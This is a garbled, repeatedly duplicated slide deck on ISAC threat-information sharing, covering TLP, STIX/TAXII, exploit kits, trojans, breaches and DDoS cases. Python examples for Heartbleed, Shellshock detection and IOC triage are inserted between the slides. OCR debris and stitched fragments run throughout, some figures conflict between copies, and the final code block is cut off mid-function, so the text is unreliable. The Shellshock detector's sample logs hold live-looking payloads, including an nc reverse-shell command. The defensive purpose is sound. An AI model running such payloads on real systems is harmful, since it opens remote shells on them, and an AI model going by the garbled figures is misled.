InformaKon13 Sharing Valu e

Structur e

Trust

Information Sharing Traffic Light Protocol

curren Restricted to a defined group (eg only those present in ameeting) Information labeled RED should not be shared withanyone outside of the group

curren This information may be shared with FS-ISAC members

curren Information may be shared with FS-ISAC members andpartners (eg vendors MSSPs customers) Information in this category is not to be shared in public forums

curren This information may be shared freely and is subject to standard copyright rules

  

     

  

Types13 of13 InformaKon SharedCyber13 Threats VulnerabiliKes Incidents

uumlMalicious Sites uumlThreat13 Actors ObjecMves13

uumlThreat13 Indicators uumlTTPs Observables uumlCourses13 of AcMon13 uumlExploit13 Targets uumlDenial of Service AOacks

uumlMalicious Emails Phishing Spearphishing

uumlSogtwareVulnerabiliMes

uumlMalicious Sogtware uumlAnalysis and risk miMgaMon

uumlIncident13 response

   

Primary Ways13 InformaKon Is13 Shared

uumlPortalAlerts uumlListservers uumlAutomaMon

Sample of Sharing Thread

Received close to 500 so far and sMll coming in 90 made it13 through to employees before being blocked by perimeter asspam

SubjectImportant13 message from BANK Sender youraccountBANKmessagecom URL hxxpwww2webmasterradiofm FanPageProcssLogonhtml

0 hits last13 7days

Wersquove had about13 50 hits so far all arediscarded

TLP AMBER13 PROPRIETARY INFORMATION

BANK SubmiOed atakedown request13 for the phishing site

Sample of ISAC Sharing

Indicators of Compromise IP Address Subject Line MD5 TTP Malware

Ask a question Anyone else seeing What do you do in this situation How do you handlehelliphelliphelliphellip

Share a Best Practice Herersquos how wehelliphellip

Share a Mitigation Strategy Herersquos a script you can usehelliphellip We did thishelliphellip

TLP AMBER13 PROPRIETARY INFORMATION

A Common Language

sect Structured Threat Information Expression is a common language a way for all to speak the same

   

   

Trusted Automated eXchange of Indicator Information (TAXII)

sect The goal of TAXII is to facilitate the exchange of structured cyber threat information sect Designed to support existing sharing paradigms in a

more automated manner

sect TAXII is a set of specifications defining the network-level activity of the exchange sect Defines services and messages to exchange data sect Does NOT dictate HOW data is handled in the

back-end WHAT data is shared or WHO it is shared with

sect TAXII is NOT a sharing program sect TAXII is a protocol over which STIX can be

transported

What is13 Cyber13 Threat Intelligence8 Constructs13 of STIX

Atomic

Tactical

Operational

What threat activity are we seeing

What threats should I look for on my networks and systems and why

Where has this What weaknesses What can I threat been seen does it exploit do about it

Strategic

Who is responsible for this threat

Why do they do this

What do they do

Threats Seen

        

Cyber13 Threat Environment

bull Actors ndash NaMon States ndash Terrorists ndash Criminals ndash Insiders ndash AcMvistsHackMvists ndash Media13 ndash Vendors13

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware-shy‐Exploit Kits Top Exploit13 Kits Seen

Blackhole EK ndash Paunch 1013 Infinity EK Flash player exploit13 Neutrino13 EK Mixes legiMmate non-shy‐legiMmate requests toobsfuscate the code Magnitude EK -shy‐ Ransomware Sweet Orange13 EK -shy‐ Website Fiesta EK -shy‐ Silverlight13 Angler EK hides behind legiMmate web code Crimeboss13 EK Java exploits

Ransomware

-shy‐Crytolocker-shy‐CryptoWall -shy‐CryptoDefense-shy‐Torrent13 Locker -shy‐Darkleach

Top infecMons USAUCanadaUKIndia Also saw Singapore trend

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning
• Port scans – open ports
• Vulnerability scans – WordPress, Joomla, Java, Flash, OpenSSL
• Infrastructure

Vulnerabilities
• OpenSSL / Heartbleed
– Old vulnerability
– Allows more data than allowed to be read
– Website vulnerability
– Banks took the rap unfairly
• GNU Bash / Shellshock
– Old vulnerability, 1994
– Unix based: Linux, Apple Mac OS X
– Went public Wednesday 9/24
– Exploits and scanning seen almost immediately
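The two bullets above name a failure mode each: Heartbleed is a missing length check that lets a peer read past the end of what it sent, and Shellshock was followed within hours by scanners putting the exploit string into HTTP headers. The block below is an added illustration written for this page, not code from the slides or from OpenSSL or bash. The Heartbleed half is a Python model of the heartbeat record check (the real bug is in C; the `MEMORY` buffer is a constructed stand-in for process memory, and the CVE numbers in the comments are supplied here, not on the slide). The Shellshock half is a detector over constructed combined-format access log lines, using RFC 5737 documentation addresses.

```python
import re
from typing import List, Optional, Tuple

# ---- Heartbleed (CVE-2014-0160): the missing length check, modelled in Python ----
#
# A TLS heartbeat record is  type(1) | payload_length(2, big-endian) | payload | padding(16).
# OpenSSL before 1.0.1g trusted payload_length from the wire and copied that many bytes
# from the record buffer into the reply, so a tiny record claiming a large payload got
# back whatever sat next to it in process memory.  `memory` is a constructed stand-in
# for that memory: the record is memory[:record_len]; what follows is "adjacent heap".

HEARTBEAT_REQUEST = 1
PADDING_LEN = 16


def heartbeat_reply(memory: bytes, record_len: int, enforce_bounds: bool) -> Optional[bytes]:
    """Return the payload a responder would echo back, or None if it rejects the record."""
    record = memory[:record_len]
    if len(record) < 3 or record[0] != HEARTBEAT_REQUEST:
        return None
    payload_len = int.from_bytes(record[1:3], "big")
    if enforce_bounds and 1 + 2 + payload_len + PADDING_LEN > record_len:
        # The fix: claimed payload plus header and padding must fit in the record received.
        return None
    # Vulnerable path (no check): copy payload_len bytes from where the payload starts,
    # regardless of where the record actually ends.
    return memory[3:3 + payload_len]


# Constructed "process memory": a 2-byte heartbeat claiming 64 bytes, then something secret.
ADJACENT_SECRET = b"Cookie: session=9f3a2c1e"
MALICIOUS_RECORD = bytes([HEARTBEAT_REQUEST]) + (64).to_bytes(2, "big") + b"hi" + bytes(PADDING_LEN)
MEMORY = MALICIOUS_RECORD + ADJACENT_SECRET
RECORD_LEN = len(MALICIOUS_RECORD)  # 21 bytes actually on the wire


# ---- Shellshock (CVE-2014-6271): spotting the scanning that followed disclosure ----
#
# Bash imported function definitions from environment variables and kept executing past
# the closing brace.  CGI hands request headers to scripts as environment variables, so
# scanners put "() { :;}; <command>" in User-Agent or Referer.  The function-definition
# prefix "() {" is the stable signature, whatever command follows it.

ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"'
)
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def shellshock_hits(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client_ip, header_field) for each combined-format access log line whose
    Referer or User-Agent carries the Shellshock function-definition prefix."""
    hits = []
    for line in log_lines:
        m = ACCESS_LOG_RE.match(line)
        if not m:
            continue  # not combined log format; a real pipeline would count these
        for field in ("referer", "user_agent"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append((m.group("ip"), field))
                break
    return hits


# Constructed sample lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [25/Sep/2014:02:14:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"-" "() { :;}; /bin/bash -c \'echo vulnerable\'"',
    '198.51.100.4 - - [25/Sep/2014:02:15:31 +0000] "GET /index.html HTTP/1.1" 200 2048 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.9 - - [25/Sep/2014:02:16:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.0" 404 209 '
    '"() { :;}; /usr/bin/nc 192.0.2.9 4444 -e /bin/sh" "curl/7.37.0"',
]

if __name__ == "__main__":
    print(heartbeat_reply(MEMORY, RECORD_LEN, enforce_bounds=False))  # leaks ADJACENT_SECRET
    print(heartbeat_reply(MEMORY, RECORD_LEN, enforce_bounds=True))   # None
    print(shellshock_hits(SAMPLE_ACCESS_LOG))
```

The log parser only handles the standard combined format and will not match lines whose header values contain embedded double quotes; the header check itself is what matters, and the same `() {` test applies to any field that ends up in a CGI environment variable.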

      

   

Breaches
Malware: ChewBacca, Dexter, BlackPOS, Backoff
• Target – 70 million – 2013
• OPM – 21.5 million
• Premera BCBS – 11.2 million
• Community Health Systems – 4.5 million
• Anthem BCBS – 80 million
• Sony / Hacking Team

2015 Breaches Identified by the ITRC as of 8/11/2015
• Total breaches: 5,500 approx.
• Total records exposed: 818,004,561
• Source: Identity Theft Resource Center

DDoS
• Sony PlayStation – Lizard Squad
• Operation Ababil
• Las Vegas – gaming industry
• Israel
• DD4BC
• World Cup

Q1 2015 Compared to Q4 2014 (Akamai)
• 15% decrease in average attack time
• 35% increase in total DDoS attacks
• 42% increase in SSDP DDoS attacks (routers)
• 22% increase in application layer DDoS attacks
• 7% decrease in average attack bandwidth (1.70 Gbps)
• 37% increase in infrastructure layer DDoS attacks

Wiper Malware
• Shamoon – 2012
– Attack on 30,000 Saudi Aramco workstations
– Corrupts files and wipes devices
• South Korean attacks – 2013
– 2 banks, a media company and an insurance company
– Patch systems targeted and used to infect
– Wiped Windows, Linux and UNIX OS
• Las Vegas casino – 2014
– Wiped and destroyed files with a VB bomb
• Sony – 2014
– SMB worm tool, listening implant, backdoor, proxy tool, destructive hard drive tool, destructive targeted cleaning tool, network propagation wiper
– Financial data destroyed; financial system still inoperable – asks for delay in filing

The Media and Vendors: Malvertising, Watering Holes
• Syrian Electronic Army

Media / Vendor Spin Incidents
• Heartbleed – OpenSSL
• Hedge fund attack – BAE
• Russians attack financial system
• Russians hack 1.2 billion passwords – Hold Security

Other Threats
• Call center – phishing
• Mobile
• Social media – Sony executive on American Airlines
• Industrial control systems – Havex
• Espionage – VirusTotal testing for malware

Case Studies

DDoS – DD4BC
Since April 2015
• From: DD4BC Team <d4bct[AT]gmail[.]com>
• Subject: DDOS ATTACK
• Size: 500 Mbps to 50 Gbps
• Duration: up to 1 hour
• Ransom demand: 25–40 BTC
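The sender address on the slide is written defanged (`[AT]`, `[.]`), as indicators on an ISAC thread normally are, so that mail clients and chat tools do not render them as live links. Turning that slide into something a SOC can act on means refanging the shared indicators for matching, and defanging your own before posting them back. The block below is an added example written for this page, not code from the presenter or from any ISAC tooling; the shared sender, subject and 25–40 BTC range are the slide's values, while the two e-mails it triages are constructed and the `likely_dd4bc` rule is an assumption of the example, not a documented attribution rule.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Values from the DD4BC slide, kept defanged exactly as they would be shared.
SHARED_SENDER_DEFANGED = "d4bct[AT]gmail[.]com"
SHARED_SUBJECT = "DDOS ATTACK"
SHARED_RANSOM_BTC = (25.0, 40.0)


def refang(indicator: str) -> str:
    """Turn a defanged indicator (hxxp, [AT], [.], [dot]) back into its matchable form."""
    s = re.sub(r"\[(?:AT|at)\]", "@", indicator)
    s = re.sub(r"\[(?:\.|dot)\]", ".", s)
    return re.sub(r"^hxxp(s?)://", r"http\1://", s)


def defang(indicator: str) -> str:
    """Defang an e-mail address or URL before pasting it into a sharing thread.
    Every dot is bracketed, path included, which is the conservative choice."""
    s = re.sub(r"^http(s?)://", r"hxxp\1://", indicator)
    return s.replace("@", "[AT]").replace(".", "[.]")


# A ransom figure in the body: "30 BTC", "0.5 bitcoin", "40 bitcoins".
BTC_DEMAND_RE = re.compile(r"(\d+(?:\.\d+)?)\s*(?:BTC|bitcoins?)\b", re.IGNORECASE)


@dataclass
class ExtortionTriage:
    sender_matches_shared: bool
    subject_matches_shared: bool
    demand_btc: Optional[float]
    demand_in_shared_range: bool

    @property
    def likely_dd4bc(self) -> bool:
        # Assumed rule for this example: the sender is the strongest indicator; otherwise
        # require subject plus a demand in the shared range, so a copycat that only reuses
        # the subject line is not attributed to the group.
        return self.sender_matches_shared or (
            self.subject_matches_shared and self.demand_in_shared_range
        )


def triage_extortion_email(sender: str, subject: str, body: str) -> ExtortionTriage:
    """Compare one inbound extortion e-mail with the indicators shared on the thread."""
    m = BTC_DEMAND_RE.search(body)
    demand = float(m.group(1)) if m else None
    lo, hi = SHARED_RANSOM_BTC
    return ExtortionTriage(
        sender_matches_shared=sender.strip().lower() == refang(SHARED_SENDER_DEFANGED).lower(),
        subject_matches_shared=SHARED_SUBJECT.lower() in subject.lower(),
        demand_btc=demand,
        demand_in_shared_range=demand is not None and lo <= demand <= hi,
    )


# Constructed messages for the usage below (not real extortion mail).
DD4BC_STYLE = dict(
    sender="d4bct@gmail.com",
    subject="DDOS ATTACK!",
    body="Your site will be hit with 50 Gbps unless 30 BTC is paid within 24 hours.",
)
COPYCAT = dict(
    sender="refunds@example.net",
    subject="DDOS ATTACK",
    body="Send 0.5 bitcoin or we take you offline.",
)

if __name__ == "__main__":
    print(defang("d4bct@gmail.com"), "<->", refang(SHARED_SENDER_DEFANGED))
    print(triage_extortion_email(**DD4BC_STYLE).likely_dd4bc)  # True
    print(triage_extortion_email(**COPYCAT).likely_dd4bc)      # False
```

Keep the shared values defanged in whatever you store and post, and refang only at the point of comparison; that way an indicator copied from the thread into a ticket or a chat never becomes a clickable link.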

United / NYSE – July 8, 2015
• United – 8:26 am – reservation system
• NYSE – 11:32 am; 11:45 am chatter; noon, definitive word

United Parcel Service
• USSS, NCCIC and FS-ISAC collaborate to release malware analysis and risk mitigation recommendations
• Shared with Retailers Association
• UPS detected and used to mitigate malware

QuesKons

Page 6: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

         

ISACs bull Oil and Natural Gas ISAC (ONG)

bull Surface TransportaMon

bull Water ISAC

bull Over the Road ampMotor Coach ISAC

bull Public Transit13 ISAC

bull Real Estate ISAC

bull Research and EducaMon ISAC

bull Retail ISAC

bull Supply Chain ISAC

ISAC

     

Other13 OperaKonal EnKKes13 and Upcoming ISACs

bull AutomoKve

bull Chemical bull Food amp Ag

bull Nuclear bull CriMcal Manufacturing

What is the National Council of ISACs

NaKonal Council of ISACs

Began meeMng in 2003 to address common concerns and cross-shy‐sector interdependencies

Volunteer group of ISACs who meet13 monthly todevelop trusted working relaMonships among sectors on issues of common interest13 and work oniniMaMves of value to CIKR13

NCI13 Structure NaMonal Council of ISACs four designated operaMonalrepresentaMves from each ISAC sit13 on the Council

ISAC Plus all other enMMesrepresentaMves such asoperaMons centers who parMcipate in informaMon sharing

Leadership Chair Denise Anderson-shy‐FS-shy‐ISAC Vice-shy‐Chair ScoO Algeier-shy‐IT-shy‐ISAC Secretary Josh Poster-shy‐ST-shy‐ISAC

Information Sources Communications

Best Practice Sharing -

Joint Statements -White Papers

Monthly Meetings

Daily amp Weekly ISAC

Calls

Briefings ENS Calls And Crisis

Calls

ListServ Trusted

Relationships ISAC Ops Centers

ISACs amp Other

Sectors

DHS amp Other Government Partners

Private Sector Liaison -NICC

Other Sources

(Hundreds)

PCIS

National Council of

ISACs

      

Examples of AcKviKes

ndash Increase involvement13 of sectors without13 ISACs ndash Daily Weekly Monthly and Crisis calls ndash Cross13 Sector13 InformaKon Sharing13 Portal ndash Private13 Sector13 Liaison with the13 NICC13 ndash DrillsExercises Such as NLEs Cyber Storm

bull OCFndash Implement13 Real-shy‐Time sector Threat13 Level

ReporMng Directorate

  

  

  

Points13 of13 Engagementbull NaMonal Infrastructure CoordinaMng Center (NICC) bull NaMonal Cybersecurity and CommunicaMons IntegraMon

Center (NCCIC) ndash DHS-shy‐led Unified OperaMons Watch ampWarning Center ndash Operates 24 hoursday 7 daysweek 365 days a year

bull Unified Command Group-shy‐composed of private and public sector representaMves ndash Meet13 monthly and during an incident13 as needed ndash Advise Assistant13 Secretary of CSampC on cybersecurity maOers provide subject13 maOer experMse and response as necessary during an incident13 that13 requires naMonal coordinaMon

wwwnationalcouncilofisacsorg nationalcouncilofisacsnatlisacsorg

InformaKon13 Sharing Valu e

Structur e

Trust

Information Sharing Traffic Light Protocol

curren Restricted to a defined group (eg only those present in ameeting) Information labeled RED should not be shared withanyone outside of the group

curren This information may be shared with FS-ISAC members

curren Information may be shared with FS-ISAC members andpartners (eg vendors MSSPs customers) Information in this category is not to be shared in public forums

curren This information may be shared freely and is subject to standard copyright rules

  

     

  

Types13 of13 InformaKon SharedCyber13 Threats VulnerabiliKes Incidents

uumlMalicious Sites uumlThreat13 Actors ObjecMves13

uumlThreat13 Indicators uumlTTPs Observables uumlCourses13 of AcMon13 uumlExploit13 Targets uumlDenial of Service AOacks

uumlMalicious Emails Phishing Spearphishing

uumlSogtwareVulnerabiliMes

uumlMalicious Sogtware uumlAnalysis and risk miMgaMon

uumlIncident13 response

   

Primary Ways13 InformaKon Is13 Shared

uumlPortalAlerts uumlListservers uumlAutomaMon

Sample of Sharing Thread

Received close to 500 so far and sMll coming in 90 made it13 through to employees before being blocked by perimeter asspam

SubjectImportant13 message from BANK Sender youraccountBANKmessagecom URL hxxpwww2webmasterradiofm FanPageProcssLogonhtml

0 hits last13 7days

Wersquove had about13 50 hits so far all arediscarded

TLP AMBER13 PROPRIETARY INFORMATION

BANK SubmiOed atakedown request13 for the phishing site

Sample of ISAC Sharing

Indicators of Compromise IP Address Subject Line MD5 TTP Malware

Ask a question Anyone else seeing What do you do in this situation How do you handlehelliphelliphelliphellip

Share a Best Practice Herersquos how wehelliphellip

Share a Mitigation Strategy Herersquos a script you can usehelliphellip We did thishelliphellip

TLP AMBER13 PROPRIETARY INFORMATION

A Common Language

sect Structured Threat Information Expression is a common language a way for all to speak the same

   

   

Trusted Automated eXchange of Indicator Information (TAXII)

sect The goal of TAXII is to facilitate the exchange of structured cyber threat information sect Designed to support existing sharing paradigms in a

more automated manner

sect TAXII is a set of specifications defining the network-level activity of the exchange sect Defines services and messages to exchange data sect Does NOT dictate HOW data is handled in the

back-end WHAT data is shared or WHO it is shared with

sect TAXII is NOT a sharing program sect TAXII is a protocol over which STIX can be

transported

What is13 Cyber13 Threat Intelligence8 Constructs13 of STIX

Atomic

Tactical

Operational

What threat activity are we seeing

What threats should I look for on my networks and systems and why

Where has this What weaknesses What can I threat been seen does it exploit do about it

Strategic

Who is responsible for this threat

Why do they do this

What do they do

Threats Seen

        

Cyber13 Threat Environment

bull Actors ndash NaMon States ndash Terrorists ndash Criminals ndash Insiders ndash AcMvistsHackMvists ndash Media13 ndash Vendors13

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware – Exploit Kits: Top Exploit Kits Seen

• Blackhole EK – Paunch (10/13)
• Infinity EK – Flash Player exploit
• Neutrino EK – Mixes legitimate and non-legitimate requests to obfuscate the code
• Magnitude EK – Ransomware
• Sweet Orange EK – Website
• Fiesta EK – Silverlight
• Angler EK – Hides behind legitimate web code
• Crimeboss EK – Java exploits

Ransomware

• CryptoLocker
• CryptoWall
• CryptoDefense
• TorrentLocker
• Darkleech

Top infections: USA/Canada/UK/India. Also saw a Singapore trend.

Delivery Mechanisms: Phishing/Spearphishing

• Court Notice
• Invoice/Statement
• Shipping themes: DHL, FedEx, UPS
• EZ Pass
• Bank phish – Swift transfer
• Dhgate invoice
• eFax
• Salesforce
• Reward themes
• Airline – Delta
• WhatsApp – "You've got a voicemail"

Malware – Banking Trojans: Top Trojans Seen

• Citadel
• Kronos
• Kuluoz – Asprox
• Carberp
• Zeus
• Zberp – hybrid
• GameOver Zeus (GOZ) – P2P (arj) 914
• Cridex – Bugat, Feodo, Dridex
• Dyre
• Shylock – July 2014 takedown

Dyre Spreads Like a Global Virus…

• June 2014: UK, US
• September 2014: Salesforce.com attacked
• October 2014: Romania, Germany and Switzerland
• November 2014: Over 100 firms targeted
• December 2014: Australia and China

Delivery Mechanisms: Drive-by Downloads and Watering Holes

Forbes.com, Energystar.com, AusPost-tracking.com, VA.gov, NBC.com – Citadel 2013

Vulnerability Scanning

• Port scans – Open ports
• Vulnerability scans – WordPress, Joomla, Java, Flash, OpenSSL
• Infrastructure

Vulnerabilities

• OpenSSL/Heartbleed
– Old vulnerability
– Allows more data than allowed to be read
– Website vulnerability
– Banks took the rap unfairly

• GNU Bash/Shellshock
– Old vulnerability (1994)
– Unix based: Linux, Apple Mac OS X
– Went public Wednesday 9/24
– Exploits and scanning seen almost immediately

Breaches

Malware: ChewBacca, Dexter, BlackPOS, Backoff

• Target – 70 million – 2013
• OPM – 21.5 million
• Premera BCBS – 11.2 million
• Community Health Systems – 4.5 million
• Anthem BCBS – 80 million
• Sony / Hacking Team

2015 Breaches Identified by the ITRC as of 8/11/2015
• Total breaches: 5,500 approx.
• Total records exposed: 818,004,561
• Source: Identity Theft Resource Center

DDoS

• Sony PlayStation – Lizard Squad
• Operation Ababil
• Las Vegas – Gaming Industry
• Israel
• DD4BC
• World Cup

Q1 2015 Compared to Q4 2014 (Akamai)

• 15% decrease in average attack time
• 35% increase in total DDoS attacks
• 42% increase in SSDP DDoS attacks (routers)
• 22% increase in application layer DDoS attacks
• 7% decrease in average attack bandwidth (170 Gbps)
• 37% increase in infrastructure layer DDoS attacks

Wiper Malware

• Shamoon – 2012
– Attack on 30,000 Saudi Aramco workstations
– Corrupts files and wipes devices

• South Korean attacks – 2013
– 2 banks, a media company and an insurance company
– Patch systems targeted and used to infect
– Wiped Windows, Linux and UNIX OS

• Las Vegas casino – 2014
– Wiped and destroyed files with VB bomb

• Sony – 2014
– SMB worm tool: listening implant, backdoor, proxy tool, destructive hard drive tool, destructive targeted cleaning tool, network propagation wiper
– Financial data destroyed, financial system still inoperable – asks for delay in filing

The Media and Vendors

Malvertising, Watering Holes

Syrian Electronic Army

Media/Vendor Spin Incidents

• Heartbleed/OpenSSL
• Hedge Fund Attack – BAE
• Russians Attack Financial System
• Russians Hack 1.4 Billion Passwords – Hold Security

Other Threats

• Call Center – Phishing
• Mobile
• Social Media – Sony executive on American Airlines
• Industrial Control Systems – Havex
• Espionage – VirusTotal testing for malware

Case Studies

DDoS – DD4BC

Since April 2015
• From: "DD4BC Team" <d4bct[AT]gmail[.]com>
• Subject: DDOS ATTACK
• Size: 500 Mbps to 50 Gbps
• Duration: Up to 1 hour
• Ransom demand: 25–40 BTC

United/NYSE

• NYSE, July 8, 2015: 11:32am; 11:45am chatter; Noon definitive word
• UNITED, 8:26am: Reservation system

United Parcel Service

• USSS, NCCIC, FS-ISAC – Collaborate to release malware analysis and risk mitigation recommendations
• Shared with Retailers Association
• UPS detected and used to mitigate malware

Questions?


Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 10: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

NCI Structure

National Council of ISACs: four designated operational representatives from each ISAC sit on the Council, plus all other entities/representatives, such as operations centers, who participate in information sharing.

Leadership: Chair – Denise Anderson, FS-ISAC; Vice-Chair – Scott Algeier, IT-ISAC; Secretary – Josh Poster, ST-ISAC

Information Sources and Communications (diagram: National Council of ISACs at the center)

Communications: best practice sharing; joint statements and white papers; monthly meetings; daily and weekly ISAC calls; briefings, ENS calls and crisis calls; ListServ.

Information sources: trusted relationships; ISAC ops centers; ISACs and other sectors; DHS and other government partners; private sector liaison (NICC); PCIS; other sources (hundreds).

Examples of Activities

• Increase involvement of sectors without ISACs
• Daily, weekly, monthly and crisis calls
• Cross-sector information sharing portal
• Private sector liaison with the NICC
• Drills/exercises, such as NLEs, Cyber Storm
• OCF – Implement Real-Time Sector Threat Level Reporting Directorate

Points of Engagement

• National Infrastructure Coordinating Center (NICC)
• National Cybersecurity and Communications Integration Center (NCCIC)
  – DHS-led unified operations watch and warning center
  – Operates 24 hours/day, 7 days/week, 365 days a year
• Unified Command Group – composed of private and public sector representatives
  – Meets monthly and during an incident as needed
  – Advises the Assistant Secretary of CS&C on cybersecurity matters; provides subject matter expertise and response as necessary during an incident that requires national coordination

www.nationalcouncilofisacs.org
nationalcouncilofisacs@natlisacs.org

Information Sharing: Value, Structure, Trust

Information Sharing: Traffic Light Protocol

• RED – Restricted to a defined group (e.g. only those present in a meeting). Information labeled RED should not be shared with anyone outside of the group.
• AMBER – This information may be shared with FS-ISAC members.
• GREEN – Information may be shared with FS-ISAC members and partners (e.g. vendors, MSSPs, customers). Information in this category is not to be shared in public forums.
• WHITE – This information may be shared freely and is subject to standard copyright rules.

Types of Information Shared: Cyber Threats, Vulnerabilities, Incidents

• Malicious sites
• Threat actors, objectives
• Threat indicators
• TTPs, observables
• Courses of action
• Exploit targets
• Denial of service attacks
• Malicious emails: phishing, spearphishing
• Software vulnerabilities
• Malicious software
• Analysis and risk mitigation
• Incident response

Primary Ways Information Is Shared

• Portal/alerts
• Listservers
• Automation

Sample of Sharing Thread

"Received close to 500 so far and still coming in. 90 made it through to employees before being blocked by perimeter as spam."

Subject: Important message from BANK
Sender: youraccount@BANKmessage.com
URL: hxxp://www2.webmasterradio.fm/FanPage/Procss/Logon.html

"0 hits last 7 days."

"We've had about 50 hits so far, all are discarded."

"BANK submitted a takedown request for the phishing site."

TLP AMBER – PROPRIETARY INFORMATION

Sample of ISAC Sharing

Indicators of Compromise: IP address, subject line, MD5, TTP, malware

Ask a question: "Anyone else seeing...?" "What do you do in this situation?" "How do you handle...?"

Share a best practice: "Here's how we..."

Share a mitigation strategy: "Here's a script you can use..." "We did this..."

TLP AMBER – PROPRIETARY INFORMATION
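The slide above lists the indicator types members exchange (IP address, subject line, MD5, TTP, malware), and the thread before it carried a sender, a subject and a phishing URL. As an added example, not code from the presentation or from any ISAC, the following Python turns those fields into the check a recipient runs against its own mail-gateway logs: it parses constructed log lines, reports which indicator each line hit, and flags mails that were delivered rather than blocked, which is the "made it through to employees" case in the thread. The log format, the MD5 value and every log line are constructed for the example; the sender, subject and URL are the thread's (the URL is defanged on the page and is re-fanged here only in memory for comparison).

```python
"""Match ISAC-shared phishing indicators against mail-gateway log lines.

Added example, not code from the presentation. The log format and every
log line below are constructed. The sender, subject and URL are the ones
the sharing thread on this page reports (given there defanged as hxxp);
the MD5 is a constructed placeholder for an attachment hash.
"""
import re
from dataclasses import dataclass, field

# Indicators as a member might load them from the thread, keyed by the IOC
# types the "Sample of ISAC Sharing" slide lists (subject line, MD5, ...).
SHARED_IOCS = {
    "subject": {"important message from bank"},
    "sender": {"youraccount@bankmessage.com"},
    "url": {"http://www2.webmasterradio.fm/FanPage/Procss/Logon.html"},
    "md5": {"0123456789abcdef0123456789abcdef"},   # constructed placeholder
}

# Constructed gateway log line format (one mail per line):
#   <ts> from=<addr> subj="<text>" url=<url|-> md5=<hex|-> action=<verb>
LOG_RE = re.compile(
    r'^(?P<ts>\S+) from=(?P<sender>\S+) subj="(?P<subject>[^"]*)" '
    r'url=(?P<url>\S+) md5=(?P<md5>\S+) action=(?P<action>\S+)$'
)

def refang(value: str) -> str:
    """Undo the usual defanging (hxxp, [.], [AT]) so URLs compare equal."""
    return value.replace("hxxp", "http").replace("[.]", ".").replace("[AT]", "@")

@dataclass
class Hit:
    ts: str
    sender: str
    matched_on: list = field(default_factory=list)
    delivered: bool = False   # True when the gateway let the mail through

def match_log(lines, iocs=SHARED_IOCS):
    """Return one Hit per log line that matches at least one shared indicator.

    Subject and sender compare case-insensitively, URL and MD5 exactly after
    re-fanging. delivered=True is the "made it through to employees" case
    from the thread: those recipients are who incident response chases first.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                      # not a gateway line; ignore
        f = m.groupdict()
        matched = []
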